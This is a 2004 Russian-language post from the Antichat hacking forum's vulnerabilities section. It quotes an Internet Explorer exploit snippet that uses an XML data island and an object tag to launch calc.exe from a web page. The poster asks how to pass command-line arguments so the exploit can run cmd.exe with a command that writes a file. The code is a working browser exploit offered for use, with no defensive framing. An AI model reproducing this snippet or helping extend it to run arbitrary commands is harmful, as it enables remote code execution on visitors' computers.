ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Internet explorer bug
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 28.06.2004, 13:30
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Всем известен кусок кода, запускающий калькулятор:
<span datasrc="#oExec" datafld="exploit"
dataformatas="html"></span>
<xml
id="oExec">
<security><exploit><![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/WINDOWS/calc.exe"></object>
]]></exploit></security>
</xml>
Вопросик:Как ещё передать параметры командной строки?Не выходит, ну например запустить cmd.exe с параметром echo aaa>1.txt???
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ